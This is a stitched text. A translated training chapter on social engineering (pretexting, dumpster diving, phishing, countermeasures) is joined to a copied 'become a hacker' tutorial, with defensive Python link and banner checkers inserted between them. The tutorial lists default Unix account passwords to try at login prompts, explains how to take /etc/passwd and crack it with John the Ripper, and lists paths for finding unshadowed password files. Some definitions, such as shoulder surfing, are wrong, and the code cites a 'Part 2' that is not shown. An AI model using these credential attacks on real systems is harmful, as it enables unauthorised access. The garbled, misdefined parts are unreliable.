Posing as Important User: in the role of an important user such as a senior manager, department head, or someone who needs help immediately, the hacker can trick users into providing a password for access to the system.

Third-person Authorization: claiming to act on someone else's authorization to access the system. For example, a hacker says he has the director's permission to use the director's account to access the system.

Calling Technical Support: calling the technical support department is a classic social engineering method. The help desk and technical support department exist to help users, which also makes them easy prey for hackers.

Shoulder Surfing is a technique for gathering information by viewing the system log file. Typically, when a user logs into the system, the login is recorded, and the recorded information can be of great help to a hacker.

Dumpster Diving is the technique of gathering information from the trash. It sounds bad, and you have to dig through other people's trash for information, but for the cause you have to accept some sacrifice. Joking aside, when gathering information from the trash of large companies, the information we need may be passwords, usernames, file names, or other confidential information. For example, in June 2000 Larry Ellison, chairman of Oracle, admitted that Oracle had used dumpster diving to try to find information about Microsoft in the antitrust case. The term larrygate is nothing new in corporate intelligence. Some of the things a dumpster can yield:

(1) Company phone directories, to know whom to call and then impersonate, as the first step toward obtaining access to sensitive data. They make it possible to get exact names and titles in order to pose as a legitimate employee. Finding the numbers to call is an easy task when the attacker can identify the company's switchboard from the directory.
(2) Organizational charts; memos; company policy manuals; calendars of meetings, events, and vacations; system manuals; printouts of sensitive data or of login names and passwords; printouts of source code; disks and tapes; retired hard drives.

A more advanced method in social engineering is Reverse Social Engineering. In this technique, the hacker becomes the provider of information. It is no surprise that the hacker is now the help desk employee: the user has lost a password and asks the help desk employee to supply it again.

4.2. Computer-Based Social Engineering

Computer-based: using software to obtain the desired information. It can be divided into the following categories:

Phishing: This term applies to an e-mail that appears to come from a business, bank, or credit card company, requesting verification of information and warning of serious consequences if this is not done. The letter usually contains a link to a fraudulent web page that looks legitimate, with the company logo and content that includes a form requesting a username, password, credit card number, or PIN.

Vishing: The term is a combination of voice and phishing. It is also a form of phishing, but the attacker calls the victim directly instead of sending e-mail. The user receives an automated message warning of a problem with their bank account. The message instructs them to call another number to fix the problem. When called, that number connects the caller to a fake support system that asks them to enter their credit card number. VoIP has further assisted this new attack form, because VoIP calls are cheap and hard to monitor.

Pop-up Windows: A window appears on the screen telling the user that he has lost his connection and needs to re-enter his username and password. A program previously installed by the intruder then e-mails the information to a remote site.

Mail attachments: Two common forms can be used. The first is malicious code. This code always hides in a file attached to an e-mail, with the aim that an unsuspecting user clicks or opens the file; examples are the ILOVEYOU virus and the Anna Kournikova worm (in that case the attached file was named AnnaKournikova.jpg.vbs; if the file name is truncated it looks like a jpg file and the user does not notice the .vbs extension). The second has a similar effect and consists of sending a hoax asking the user to delete a legitimate file. These are designed to clog the mail system by reporting a non-existent threat and asking the recipient to forward a copy to all their friends and colleagues. This can produce what is called the snowball effect.

Websites: A trick to get users to unwittingly reveal sensitive data, such as the password they use at work. For example, a website may run a fictitious contest that requires the user to enter an e-mail address and password. The password entered may be similar to the password used at work. Many employees will enter the same password they use at work, so the social engineer obtains a valid username and password for access to the organization's network.

Interesting Software: In this case the victim is persuaded to download and install a program or application that looks useful, such as one that improves CPU or RAM performance, a system utility, or a crack for using licensed software. Spyware or malware (such as a keylogger) is then installed by way of a malicious program disguised as a legitimate one.

5. Steps of a social engineering attack


5.1. Information gathering

One of the keys to success in social engineering is information. It is surprisingly easy to gather enough information about an organization and the employees in it. Organizations tend to put far too much information on their websites as part of their business strategy. This information often describes, or gives clues about, which suppliers may be under contract; phone and e-mail lists; and whether there are branch offices and, if so, where they are located. All of this information can be useful to potential investors, but it can also be used in a social engineering attack. What organizations throw away can be an important information resource. Searching the trash can uncover invoices, correspondence, manuals, and so on that can help the attacker obtain important information. The attacker's goal in this step is to learn as much as possible in order to pose as a legitimate employee, supplier, or strategic partner.

5.2. Selecting the target

Once a suitable amount of information has been gathered, the attacker looks for noticeable weak points among the organization's employees. A common target is technical support staff, who are trained mostly to be helpful and can change passwords, create accounts, reactivate accounts, and so on. The goal of most attackers is to gather sensitive information and gain a foothold in the system. Attackers realize that once they can gain access, even guest-level access, they can escalate their privileges, start destructive attacks, and cover their tracks. Administrative assistants are the next target, because these individuals have access to sensitive data that normally circulates among senior management. Many of these assistants perform daily tasks for their managers that require the privileges of the manager's account.

5.3. The attack

The actual attack is usually based on what we call deception. There are three main types:

1.

Ego attack: in this first type of attack, the attacker relies on some basic human traits. We all like to talk about how smart we are and what we know, or what we are doing, or how we would fix the company. The attacker uses this to extract information from the victim. Attackers often choose victims who feel under-appreciated and are working in a position beneath their talent. The attacker can usually judge this after only a short conversation.

2. Sympathy attacks: In this second type of attack, the attacker usually pretends to be a trainee, a contractor, or a new employee of a supplier or strategic partner who has run into an awkward situation and needs help to finish a task.

The importance of the information-gathering step becomes clear here, as the attacker builds credibility with the victim by using the appropriate industry terms or demonstrating knowledge of the organization. The attacker pretends to be busy and to have to complete some task that requires access, but cannot remember the username and password. A sense of urgency is always part of the scenario. Because human nature is sympathetic, in most cases the request is granted. If the attacker fails to obtain access or information from one employee, he keeps trying until he finds a sympathetic person, or until he realizes the organization has become suspicious.

3.

Intimidation attacks: In the third type, the attacker pretends to be an authority figure, such as an influential person in the organization. The attacker targets victims whose position is below that of the person being impersonated. The attacker creates a plausible reason for requests such as resetting a password, changing an account, accessing a system, or obtaining sensitive information.

6. Common attack types


6.1. Insider Attacks
If a hacker cannot find any way to attack the organization, the next best option for getting in is to hire an employee, or to find a disgruntled employee, as an insider who will provide the needed information. This is the insider attack. An insider attack has a great advantage, because such spies are allowed physical access to the company's systems and can move in and out of the company freely. A well-known example in Vietnam is the attack on Vietnamnet (2010), which is believed to be related to leaks of internal information. Another kind of insider attack is sabotage by the employees themselves. An employee works for a low salary and wants a higher one; by breaking into the company's HR database, he can change his own pay. Or, in another case, an employee who wants more money steals the business plans and sells them to other companies.

Protecting against insider attacks

Preventing this kind of attack is genuinely hard. It has nothing to do with machines or software; it is a matter of human psychology. We cannot predict when an employee will turn against us, or be bought or coerced into taking part in an attack. Preventing it requires a company with strong team spirit, and directors and leaders who understand the psychology of their employees. How to keep employees from betraying you is more a matter of the art of conduct. Organizations usually hire security staff and set policies against attacks from outside, but rarely guard against the inside. As for intrusion detection systems (IDS), most are designed and deployed to detect threats from outside. However, that is not the whole story: an IDS is also valuable for detecting insider attacks, if the security staff know how to use it.

6.2. Identity Theft

A hacker can impersonate an employee or steal an employee's identity to get into the system. Information gathered through dumpster diving or shoulder surfing, combined with a fake ID, can help the hacker break into the organization. Creating an account to enter the system without anyone objecting is, figuratively speaking, legal theft (identity theft).

6.3. Phishing Attacks

E-mail-related scams usually target banks, credit card companies, or financial organizations. The e-mail asks the recipient to confirm bank information, or to reset their e-mail or PIN. The user clicks a link in the e-mail and is taken to a fake website. The hacker captures the information for financial gain or to prepare another attack. In these attacks the prey are ordinary users, who simply provide the information the hacker asks for. Therefore the defending side is the companies that provide the service, which must make it impossible for the hacker to impersonate them.

6.4. Online Scams

Some websites offer free gifts or special discounts on something, which can entice a victim to log in with the username and password they use every day to log into the company computer system. The hacker can use the valid username and password once the victim enters this information on the website. Malicious code attached to an e-mail sent to the victim may be a keylogger program that captures passwords. Viruses, trojans, and worms are other things that can be attached to an e-mail to entice the user to open the file. The example below is a fraudulent e-mail meant to lure the victim into opening an unsafe link.

Pop-up windows are a similar technique. In this method, a pop-up window opens and invites the user to install free software on the computer. In this way the victim unintentionally installs malicious code.

6.5. URL Obfuscation

A URL is normally typed into the browser's address bar to access a specific website. URL obfuscation is hiding or faking a URL so that what appears in the address bar looks legitimate. For example, the address http://204.13.144.2/Citibanj may appear to be a legitimate address for the Citibank bank, but in fact it is not. URL obfuscation is used to make an online scam attack look more legitimate. A website may look legitimate, with the company's images and name, but the links in it lead to the hacker's websites. The fake targets careless users. For example, you visit http://ebay.com and carry out a normal transaction. However, you have landed on the hacker's fake page: eBay's website is https://ebay.com. The only difference is the protocol, http versus https.
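An added example, not part of the original text: a Python check that flags the obfuscation tricks described above from the defender's side (an IP-literal host, a displayed https link whose real href is http, a displayed domain that differs from the real one, and a brand name that appears in the link but not in its registrable domain). The sample links are constructed, with comtoso.com and example.net standing in for attacker domains; the registrable-domain helper is a crude last-two-labels approximation with no public-suffix list.

```python
"""Spot URL obfuscation tricks in links before a user follows them.

Added example: the sample links are constructed (comtoso.com and example.net
stand in for attacker domains); the registrable-domain helper is a crude
last-two-labels approximation with no public-suffix list.
"""
import ipaddress
import re
from urllib.parse import urlsplit


def _host(url):
    """Lower-cased hostname of a URL, or None if it has none or cannot be parsed."""
    try:
        return (urlsplit(url).hostname or "").lower() or None
    except ValueError:
        return None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _registrable(host):
    """Crude 'company domain' of a host: its last two labels."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def check_link(display_text, href, brand_keywords=()):
    """Return the findings for one link (an empty list means nothing suspicious).

    ip-literal-host    : the real link's host is a bare IP address
    scheme-mismatch    : the displayed URL's scheme (http/https) differs from the real one
    host-mismatch      : the displayed URL's domain differs from the real link's domain
    brand-outside-host : a brand word appears in the link but not in its registrable domain
    """
    real_host = _host(href)
    if real_host is None:
        return ["unparseable-href"]
    findings = []
    if _is_ip_literal(real_host):
        findings.append("ip-literal-host")
    shown = display_text.strip()
    if re.match(r"https?://", shown, re.IGNORECASE):
        if urlsplit(shown).scheme.lower() != urlsplit(href).scheme.lower():
            findings.append("scheme-mismatch")
        shown_host = _host(shown)
        if shown_host and _registrable(shown_host) != _registrable(real_host):
            findings.append("host-mismatch")
    lowered = href.lower()
    for brand in brand_keywords:
        b = brand.lower()
        if b in lowered and b not in _registrable(real_host):
            findings.append("brand-outside-host")
            break
    return findings


# Constructed links in the style of the examples in the text
SAMPLE_LINKS = [
    ("Citibank", "http://204.13.144.2/Citibanj"),
    ("https://www.contoso.com/account", "http://www.comtoso.com/account"),
    ("https://ebay.com", "http://ebay.com"),
    ("Log in", "http://paypal.com.example.net/login"),
    ("My bank", "https://www.examplebank.com/login"),
]


def scan_links(links, brand_keywords=("citibank", "paypal", "ebay")):
    """Return {href: findings} for every link that has at least one finding."""
    report = {}
    for text, href in links:
        findings = check_link(text, href, brand_keywords)
        if findings:
            report[href] = findings
    return report


if __name__ == "__main__":
    for href, findings in scan_links(SAMPLE_LINKS).items():
        print(href, "->", ", ".join(findings))
```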

7. Social Engineering Threats
7.1. Online Threats
With the rapid growth of the Internet, computers need to be connected for work, to meet information requirements from both outside and inside. These connections are an opportunity for hackers to reach employees. Attacks through e-mail, pop-up windows, and instant messages use trojans, worms, and viruses that cause damage and destroy computing resources. The social engineer approaches employees and persuades them to provide information through tricks, rather than infecting computers with malware through a direct attack. A social engineering attack can give the hacker the information needed to prepare a much stronger attack afterward. Therefore, employees must be advised and warned about how to recognize and avoid online social engineering attacks.

E-mail threats: Many employees receive dozens or hundreds of e-mails a day, both from business activities and from private e-mail systems. The sheer volume of e-mail can make checking it harder, and vigilance against impersonated e-mail drops accordingly. That is the hacker's opportunity to pose as a sender the victim knows in order to entice the victim into providing the needed information. An example of this kind of attack is an e-mail sent to employees saying that the boss wants every employee's vacation schedule in order to organize a meeting. It is simply a matter of making the e-mail sent to the employees appear to originate from the boss. The employees, not being cautious, provide the requested information without hesitation. Knowing employees' vacation schedules may not look like a security threat, but it means something to a hacker, who now knows when an employee is away. The hacker can then impersonate the absent employee and reduce the chance of being detected. E-mail-related scams usually target banks, credit card companies, or financial organizations. The e-mail asks the recipient to confirm bank information, or to reset their e-mail or PIN. The user clicks a link in the e-mail and is taken to a fake website. The hacker captures the information for financial gain or to prepare another attack. In these attacks the prey are ordinary users, who simply provide the information the hacker asks for. Therefore the defending side is the companies that provide the service, which must make it impossible for the hacker to impersonate them. Another scam using this technique is the following e-mail:

Looking closely we can see two differences: the text of the link suggests that this site is secure and uses https, whereas the real link behind it uses http; and the company name in the mail is Contoso, whereas the company name in the real link is Comtoso.

Pop-Up Applications and Dialog Boxes: It is unrealistic to expect employees to use the Internet only for company business. Most employees browse the Web for personal reasons, such as shopping or online research, and through that personal browsing the company's computers are exposed to social engineering. Even if the company is not the hacker's specific target, employees will be used in an attempt to gain access to company resources. One common goal is to plant a mail engine inside the company's computing environment, from which the hacker can launch phishing or other attacks against personal or company e-mail. Two common ways of luring a user into clicking a button in a dialog box are to warn of a problem, for example by displaying a fake application or system error message, and to offer an extra service, for example a free download of an application that speeds up the computer. Experienced employees (IT staff, for instance) are not easily fooled by these tricks, but inexperienced users can be threatened and deceived by them. Protecting users from social engineering pop-ups is largely a matter of awareness. You can configure browsers to block pop-ups and automatic downloads by default, but some pop-ups get past that setting. It is more effective to make sure users know not to click inside a pop-up window before checking with IT staff.

Instant Messaging: IM carries several potential threats when a hacker targets it. The first is its informal nature. The chatty character of IM, combined with the freedom to choose any nickname, means it is never entirely clear that you are talking to the person you believe you know. The illustration below shows how spoofing works, for both e-mail and IM:

The hacker (shown in red in the figure) spoofs a user the victim knows and sends an e-mail or IM message that the recipient assumes comes from that person. Familiarity lowers the user's defences, so they are more likely to click a link or open an attachment from someone they know, or think they know.
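The mismatch between a link's visible text and its real target, which the Contoso/Comtoso mail above relies on, can be checked mechanically. The following is an added example and not part of this training material: it parses the anchors in an HTML e-mail body and flags those whose displayed URL differs from the href by scheme, by host, or by a one-character lookalike domain. The e-mail body inside it is constructed, and the "one character apart" rule is an assumed heuristic, not a complete phishing filter.

```python
"""Flag links whose visible text says one thing and whose target says another.

Added example; it is not part of the training material above. The e-mail
body below is constructed for the demonstration, and the 'one character
apart' rule for lookalike domains is a deliberately simple heuristic.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _looks_like_url(text):
    return text.lower().startswith(("http://", "https://", "www."))


def _host(url):
    """Host name of a URL; bare 'www.example.com' text is treated as http."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def _registrable(host):
    """Crude owner part of a host name: its last two labels (contoso.com)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def _one_char_apart(a, b):
    """True when a and b differ by exactly one substitution, insertion or deletion."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    longer, shorter = (a, b) if len(a) > len(b) else (b, a)
    return any(longer[:i] + longer[i + 1:] == shorter for i in range(len(longer)))


def audit_links(html_body):
    """Return a list of suspicious links as {'href', 'text', 'reasons'} dicts.

    Only anchors whose visible text itself looks like a URL are judged,
    because that is where a mismatch misleads the reader.
    """
    parser = _AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        if not _looks_like_url(text):
            continue
        reasons = []
        if text.lower().startswith("https://") and href.lower().startswith("http://"):
            reasons.append("text claims https, target is plain http")
        text_host, href_host = _host(text), _host(href)
        if text_host != href_host:
            reasons.append("text shows host %s, target is %s" % (text_host, href_host))
            if _one_char_apart(_registrable(text_host), _registrable(href_host)):
                reasons.append("lookalike domain: %s vs %s"
                               % (_registrable(href_host), _registrable(text_host)))
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample, modelled on the Contoso/Comtoso mail described above.
SAMPLE_EMAIL = """
<p>Dear customer,</p>
<p>Please confirm your account details at
<a href="http://www.comtoso.com/verify">https://www.contoso.com/verify</a>
within 24 hours.</p>
<p>Regards, <a href="https://www.contoso.com/">Contoso</a> customer care</p>
"""

if __name__ == "__main__":
    for finding in audit_links(SAMPLE_EMAIL):
        print(finding["text"], "->", finding["href"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

Running it on the sample prints the one deceptive link with all three reasons; the second anchor is ignored because its visible text ("Contoso") is not a URL and so cannot contradict the target. A mail gateway would apply the same check to every inbound HTML part and quarantine or annotate messages that produce findings.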

7.2. Telephone-Based Threats

The telephone is a medium where people pay little attention to security, and there are also few hackers attacking to break telephone systems themselves. But using the telephone in the service of some other network attack is far from unheard of. Calling victims and persuading them to give up information, following a fake scenario the hacker has scripted in advance, is the biggest threat of telephone-based social engineering.

It does not stop there: VoIP is spreading, and more and more businesses use it. Attacking VoIP networks to eavesdrop on calls is where hackers are heading. Call interception used to serve only security and law-enforcement agencies, but hackers have abused it to listen in on executives' confidential discussions.

7.3. Waste Management Threats

Dumpster diving is a valuable activity for the hacker. Discarded paper can contain information of immediate use, such as thrown-away user IDs and account numbers, or background information such as organisation charts and telephone lists. Information of this kind is priceless to the social engineer, because it makes him look credible when he opens the attack. Electronic storage media are even more useful. If a company has no waste-management rules covering the disposal of surplus media, all kinds of information can be found on unused hard disks, CDs and DVDs. Employees must fully understand the consequences of throwing paper waste or electronic storage media into the rubbish. Once waste has left the company's premises its ownership can become legally unclear, and dumpster diving may not be considered illegal in every circumstance, so guidance on waste disposal must be given.

Always shred waste paper into small pieces, and erase or destroy magnetic media. If an item of waste is too large or too awkward for the shredder, such as a telephone directory, or too technical for the user to destroy, a protocol for disposing of it must be developed. Rubbish containers should stand in a secure area that the public cannot reach.

Besides managing waste that leaves the building, waste inside it must be managed too. Security policies often do not cover this, because it is assumed that anyone allowed into the company must be trustworthy. Clearly that is not always true. One of the most effective measures for managing paper waste is a data classification scheme: you define categories of paper according to the information it carries and specify how employees dispose of each. For example, the categories could be: company confidential, private, office, public.

7.4. Personal Approaches

The most direct and simplest way for a hacker to get information is to ask for it. The approach seems crude and obvious, but it is the foundation of confidence tricks. Four main approaches account for the social engineer's success:
Intimidation: this approach may involve impersonating a person in authority to force the target to comply with a request.
Persuasion: the usual forms of persuasion are flattery, or claiming to know well-known people.

Ingratiation: this approach is a long-term ploy in which a subordinate or colleague builds a relationship in order to win trust, and eventually information, from the target.
Assistance: with this approach the hacker offers to help the target. The help ends up requiring the target to reveal personal information, which helps the hacker steal the target's identity.
Protecting users against these kinds of personal approach is very difficult. It depends largely on employee awareness. Building a working environment worthy of trust lowers the hacker's rate of success, and regularly holding training programmes on security risks is the best way to raise employees' awareness against this kind of attack.

7.5. Reverse Social Engineering

This is a more advanced form of social engineering that avoids the usual difficulties of the ordinary kind. It can be described as a legitimate user of the system asking the hacker for information. In RSE the hacker is believed to hold a position of authority over the legitimate user, who is in fact the target. To carry out an RSE attack the attacker must know the system and must already have some prior access, usually obtained by ordinary social engineering. A typical RSE attack has three parts: sabotage, advertising and assisting. After gaining access by other means, the hacker sabotages the workstation by crashing it or making it appear broken; a flood of error messages, altered parameters or options, or a fake program can all do the job. The user notices the trouble and looks for help. To be the person the user calls, the attacker must advertise that he is able to fix the problem, for example by leaving fake business cards around the offices or even by supplying a fake telephone number inside the error message itself.

8. Countermeasures against Social Engineering

Deciding how to counter social engineering is an important part of both defensive and offensive technique. Because it is a social problem, preventing it is complicated by human nature. There are several ways to go about it. The company's security policy determines the safety of the system: you need to set rules that limit the access rights of employees. Good security training for employees is essential; when your employees understand the security issues they will avoid risks themselves, before the security department has to intervene. The human factor is no less important, since this attack technique works mostly on people's minds: careless employees, and employees who have lost trust in the company, are both risks to the system's security.

Build a security management framework: define the set of social engineering security goals and the staff responsible for delivering them.
Assess the risks: threats do not pose the same level of risk to every company. Review each social engineering threat and weigh its danger to your own organisation.
Put social engineering into the security policy: write a document that sets out policies and procedures telling employees how to handle situations that may be social engineering attacks. This step assumes a security policy already exists, covering more than social engineering threats; if there is no security policy yet, one must be developed.

9. Summary
You need to master the following before moving on to the next chapter:

Social engineering is a social technique that uses human relationships to gather the information needed for later attacks. The most important point of the technique is that it relies on human weakness. The steps of a social engineering attack are: gather information, choose the target, attack. Common attack types include Insider Attack, Identity Theft, Online Scam and Phishing. Finally, for defending against this kind of attack, nothing is as effective as educating your employees about the scams so that they stay alert.

///////////////

Become a hacker 1
The most basic knowledge to become a hacker, Part 1 (this whole article is taken from www.hvanews.net). Many newbies have asked me: what is hacking? How do I hack? But you forget one thing: you need general knowledge first, and you need to understand the terms that people who know networks use. I am not that good myself, but through study I have gathered some basic knowledge that I want to share with all of you so we can learn together. I will not be held responsible if you use it to harass other people. You may copy or post this on other web sites, but please include the author's name under the article; respecting this article is respecting me and my effort, and respecting yourselves too. I have also included some hacking and cracking methods with basic examples that you can try out and study to understand more, so that when you run into a term

you do not understand, read this to find out. In it I have used parts of articles I found very good on the HVA web site and on other sites I have visited. Thanks to the authors of those articles. Now to the main subject.

1.) What do we need to start?
Many of you may disagree with me, but the best way to practise is to use Windows 9X first and then move on to stronger systems like Linux or Unix. Here is what you need:
+ An OS (DOS, Windows 9X, Linux, Unix, ...)
+ A good web site (HVA, for example)
+ A good web browser (Netscape, IE, but probably best is Mozilla)
+ A good chat tool (mIRC, Yahoo Messenger, ...)
+ Telnet (or similar tools such as nmap)
+ The most important thing for anyone who wants to become a hacker: some programming knowledge (C, C++, Visual Basic, Perl, ...)

2.) What is an IP address?
An IP address is written as four numbers, each between 0 and 255. Each number is stored in one byte, so an IP address is 4 bytes, and the address space is divided into classes. The three classes in everyday use are A, B and C. A class A network can hold about 16 million addresses, a class B network 65,536. Example: class B network 132.25 covers every address from 132.25.0.0 to 132.25.255.255. Most class A networks belong to large companies or organisations; an ISP typically owns a few class B or C networks. Example: if your IP address is 132.25.23.24 you can work out who your ISP is (the owner of 132.25.x.x).
IP stands for Internet Protocol. On the Internet each host's IP address is unique and represents that host; computers use IP addresses to recognise the machines connecting to them. This is why you can be banned on IRC, and it is how people find your IP. An IP address is easy to discover; people can get it in these ways:
+ when you browse a web site, your IP is logged
+ on IRC, anyone can get your IP
+ on ICQ, everyone can see your IP, and even if you select "do not show IP" it can still be obtained
+ if you connect to someone, they can run systat and see who is connected to them
+ if someone sends you an e-mail containing Java code that looks up the IP, they can find your IP as well
(HVA material)

3.) How do I find my own IP address?

+ In Windows: go to Start > Run and type winipcfg.
+ In mIRC: connect to the server, then type /dns.
+ Through one of the web sites that display your IP.

4.) What is IP spoofing?
An IP number is meant to identify one device uniquely in the world, so a server on a network can let another device exchange data with it without further checks. It is possible, however, to change your IP: you can send forged data to another machine, and that machine believes the data came from some other machine (not yours). You can get past a server without having control of it. The obstacle is that the server's replies go to the device whose IP we spoofed, so you may never receive the replies you wanted. Probably the only situations where IP spoofing pays off are getting past a firewall, stealing accounts and hiding your own identity! (HVA material)

5.) What are trojans, worms, viruses and logic bombs?
Trojan: put simply, a spy program installed on someone else's computer to steal data there and send it back to whoever planted it. What it steals can be passwords, accounts or cookies, depending on what the person who planted it wants.
Virus: put simply, a program with special code that is installed on (or spreads from another machine to) the victim's computer and carries out what that code demands; most viruses are used to destroy data or damage the computer.
Worm: a stand-alone program that can copy itself and spread throughout a network. Like a virus it can destroy data or damage the network itself, and it can sometimes bring the network down.
Logic bomb: malicious code planted in a program or system that stays dormant until a trigger condition is met (a date, an event) and then fires its payload. It should not be confused with a flooder, a program that fires many packets at one address to swamp the system or clog the link (on a server), or with the mail bomb used to harass a target.

6.) What is PGP?
PGP stands for Pretty Good Privacy. It is a tool that uses public-key encryption to protect e-mail and data files; it is a highly secure form of encryption with software for MS-DOS, Unix, VAX/VMS and other platforms.

7.) What is a proxy?
A proxy gives users Internet access through hosts that stay hidden. Proxy servers serve one specific protocol or a set of protocols, and run on a dual-homed host or a bastion host.
The user's client programs go through the proxy server as an intermediary instead of talking to the real server the user needs. The proxy server examines the requests from the client and decides whether or not to serve them; if a request is accepted, the proxy server connects to the real server on the client's behalf and then keeps relaying the client's requests to the server and the server's responses back to the client. The proxy server is therefore a bridge between server and client.

A proxy lets users reach services on the Internet in a direct sense. With a dual-homed host you must log in to the host before using any Internet service, which is inconvenient, and some people get frustrated when they feel they are going through a firewall; a proxy solves that. It does need new protocols, but in general it is fairly convenient for the user. Because the proxy lets users reach Internet services from their own systems, no packet travels directly between the user's system and the Internet: the path is indirect, through a dual-homed host or through a combination of a bastion host and a screening router. (Article by Z3RON3, HVA material)

8.) What is Unix?
Unix is an operating system (like Windows). It is currently the most powerful OS and the one closest to hackers. If you want to become a real hacker you cannot do without it. It is used with, and supports, programming in the C language.

9.) What is Telnet?
Telnet is a program that lets us connect to another machine through a port. Every computer or server has ports; some common ones are:
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois
Example: you can telnet to mail.virgin.net on port 25.

10.) How do I know I have telnetted to a Unix system?
OK, I will tell you how a Unix system greets you when you connect to it. When you call a Unix system it usually shows a prompt, "Login:" (that alone does not prove it is Unix, unless a message appears before the "login:", for example "Welcome to SHUnix. Please log in."). At the login prompt you must enter a valid account name. An account name is usually 8 characters; after you enter it you are prompted for a password. Try the default passwords from this table:

    Account     Default password
    root        root
    sys         sys / system / bin
    bin         sys / bin
    mountfsys   mountfsys
    nuucp       anon
    anon        anon
    user        user
    games       games
    install     install
    demo        demo
    guest       guest

11.) What is a shell account?
A shell account lets you use your computer as a terminal from which you send commands to a computer running Unix. The shell is the program that interprets the characters you send and runs the Unix commands. With a real shell account you can use a workstation far more powerful than you can imagine. You can get a free shell account at www.freeshell.com, although you will not be able to use telnet until you pay for it.

12.) How can you crack Unix account passwords?
Very simple, though the method I describe here is outdated; you may crack them if you are lucky, otherwise read it as background. First log in to the Unix system as a customer or guest. If you are lucky you will get the password file, kept on standard systems at /etc/passwd. Each line in the passwd file is a different account and looks like this:

    userid:password:userid#:groupid#:GECOS field:home dir:shell

where:
+ userid = the user id name, the login name: a name or a number.
+ password: the password, stored in hashed (encrypted) form. You know what it is for.
+ userid#: a unique number assigned to the user when the account was first created.
+ groupid#: like userid#, but shared by the users in a group (like HVA's Hunter Buq group).
+ GECOS field: information about the user: full name, telephone number, address, etc. This is also a good source for guessing the password.
+ home dir: the user's home directory, where their files live.
+ shell: the name of the shell that starts automatically when they log in.
Take the password file, pull out the hashed text, then crack it with CrackerJack or John the Ripper.
Sounds easy, doesn't it? Wrong; it is not easy, with luck you can crack it, but nowadays most systems hide it carefully. Keep reading and you will see where it gets hard.
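Sections 9 and 10 identify a system by what it says when you connect, and the WinGate section in Part 2 does the same thing with the WinGate> prompt. Below is an added example, not code from this article, that grabs a service's first output over TCP and classifies it: an FTP or SMTP 220 greeting (from which it also derives the IIS anonymous account name the way Part 2 does), a Unix login: prompt with its banner, or a WinGate prompt. The loopback server it talks to is constructed so the example runs without a network; the greetings it is fed are the ones quoted in this article.

```python
"""Grab a TCP service banner and work out what answered, offline-testable.

Added example, not code from the article. It recognises the greetings the
article mentions (an FTP/SMTP 220 line, a Unix login: prompt, the WinGate>
proxy prompt of Part 2) and derives the default IIS anonymous account name
from an FTP banner the way Part 2 does. The fake server is constructed so
the example runs without a network.
"""
import re
import socket
import threading


def grab_banner(host, port, timeout=3.0, max_bytes=1024):
    """Connect to host:port and return whatever the service says first."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            data = sock.recv(max_bytes)
        except socket.timeout:
            data = b""
    return data.decode("latin-1", errors="replace")


# 220 <name> <software>: the greeting shape shared by FTP and SMTP servers.
_FTP_RE = re.compile(r"^220[ -](\S+)\s+(.*\bFTP\b.*)$", re.I | re.M)
_SMTP_RE = re.compile(r"^220[ -](\S+)\s+(.*\bE?SMTP\b.*)$", re.I | re.M)


def classify_banner(banner):
    """Guess (service, details) from the first text a service sends."""
    text = banner.strip()
    m = _FTP_RE.search(text)
    if m:
        return "ftp", {"server_name": m.group(1), "software": m.group(2).strip()}
    m = _SMTP_RE.search(text)
    if m:
        return "smtp", {"server_name": m.group(1), "software": m.group(2).strip()}
    if re.search(r"^\s*wingate>", text, re.I | re.M):
        return "wingate-proxy", {}
    if re.search(r"log\s?in:\s*$", text, re.I):
        # A 'login:' prompt; any line before it is the system's greeting.
        lines = text.splitlines()
        return "unix-login", {"greeting": lines[0] if len(lines) > 1 else ""}
    return "unknown", {}


def iis_anonymous_account(server_name):
    """Default IIS anonymous account: IUSR_<machine name> (Part 2's deduction)."""
    return "IUSR_" + server_name.upper()


def _serve_banner_once(banner, ready):
    """Constructed one-shot server: accept one client, send the banner, close."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()
    conn, _ = srv.accept()
    conn.sendall(banner.encode("latin-1"))
    conn.close()
    srv.close()


def grab_from_fake_server(banner):
    """Run the fake server on a loopback port and grab its banner."""
    ready = {"event": threading.Event()}
    t = threading.Thread(target=_serve_banner_once, args=(banner, ready), daemon=True)
    t.start()
    ready["event"].wait(2)
    result = grab_banner("127.0.0.1", ready["port"])
    t.join(2)
    return result


if __name__ == "__main__":
    got = grab_from_fake_server("220 Vdodgy Microsoft FTP Service (Version 3.0).\r\n")
    service, info = classify_banner(got)
    print(service, info, iis_anonymous_account(info["server_name"]))
```

Against a real host you would call grab_banner(host, 21) or (host, 25) directly; the greeting is sent before any input, so no probe is needed. Note that a banner is only a claim: administrators can edit it, so treat the classification as a hint to be confirmed, not as proof of the platform.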

13.) What is a shadowed password?
A shadowed password is known from the Unix passwd file: instead of the password hash, the password field holds only a placeholder (such as x or *). That tells you the real hashes are kept elsewhere, in a file an ordinary user cannot read. Are we stuck? Of course a hacker is not: if we cannot read the shadowed password file directly we look for its copy, the unshadowed file. These files are not in a fixed place on Unix systems; try each of the following paths in turn:

    AIX 3                    /etc/security/passwd             !   or /tcb/auth/files/ /
    A/UX 3.0s                /tcb/files/auth/?/               *
    BSD4.3-Reno              /etc/master.passwd               *
    ConvexOS 10              /etc/shadpw                      *
